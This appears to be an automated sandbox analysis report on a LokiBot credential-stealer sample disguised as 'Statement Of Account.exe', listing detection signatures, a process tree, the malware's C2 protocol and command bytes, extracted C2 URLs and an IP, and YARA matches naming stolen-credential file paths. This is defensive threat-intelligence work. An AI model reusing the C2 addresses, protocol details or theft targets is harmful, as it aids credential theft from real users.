Edit tour

Windows Analysis Report
Statement Of Account.exe

Overview

General Information

Sample name:	Statement Of Account.exe
Analysis ID:	1543094
MD5:	8d03a09d0f5d5f2c196be0657d169636
SHA1:	fb44ba8de7862e644239d29343550eb879b25dd8
SHA256:	ac3f8b19b1d29525dddb1d48e4fcf7aec60ea5d93bcf9b874f9a61adde4ca13c
Tags:	exeuser-threatcat_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Lokibot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Statement Of Account.exe (PID: 6976 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 8D03A09D0F5D5F2C196BE0657D169636)

svchost.exe (PID: 1520 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

Statement Of Account.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 8D03A09D0F5D5F2C196BE0657D169636)

svchost.exe (PID: 3948 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

Statement Of Account.exe (PID: 1124 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 8D03A09D0F5D5F2C196BE0657D169636)

svchost.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

Statement Of Account.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 8D03A09D0F5D5F2C196BE0657D169636)

svchost.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

Statement Of Account.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 8D03A09D0F5D5F2C196BE0657D169636)

svchost.exe (PID: 5648 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.220/skipo/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000000A.00000002.3296173154.0000000002E12000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Process Memory Space: Statement Of Account.exe PID: 6976	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Statement Of Account.exe PID: 6976	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Statement Of Account.exe PID: 6976	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x75a87:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Statement Of Account.exe PID: 6540	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Statement Of Account.exe PID: 6540	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Statement Of Account.exe PID: 6540	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x20bdc1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Statement Of Account.exe PID: 1124	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Statement Of Account.exe PID: 1124	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Statement Of Account.exe PID: 1124	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x244ac3:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Statement Of Account.exe PID: 6568	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Statement Of Account.exe PID: 6568	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Statement Of Account.exe PID: 6568	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x176088:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Statement Of Account.exe PID: 6416	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Statement Of Account.exe PID: 6416	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Statement Of Account.exe PID: 6416	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x158f78:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 5648	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 5648	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: svchost.exe PID: 5648	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 5648	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x22eaa:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 63 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.Statement Of Account.exe.2fb0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.Statement Of Account.exe.2fb0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.Statement Of Account.exe.2fb0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.Statement Of Account.exe.2fb0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
3.2.Statement Of Account.exe.2fb0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Statement Of Account.exe.b80000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Statement Of Account.exe.b80000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Statement Of Account.exe.b80000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Statement Of Account.exe.b80000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Statement Of Account.exe.b80000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Statement Of Account.exe.b80000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Statement Of Account.exe.b80000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Statement Of Account.exe.b80000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.2.Statement Of Account.exe.2eb0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.Statement Of Account.exe.2eb0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.Statement Of Account.exe.2eb0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Statement Of Account.exe.2eb0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.Statement Of Account.exe.2eb0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.Statement Of Account.exe.2eb0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.Statement Of Account.exe.2eb0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
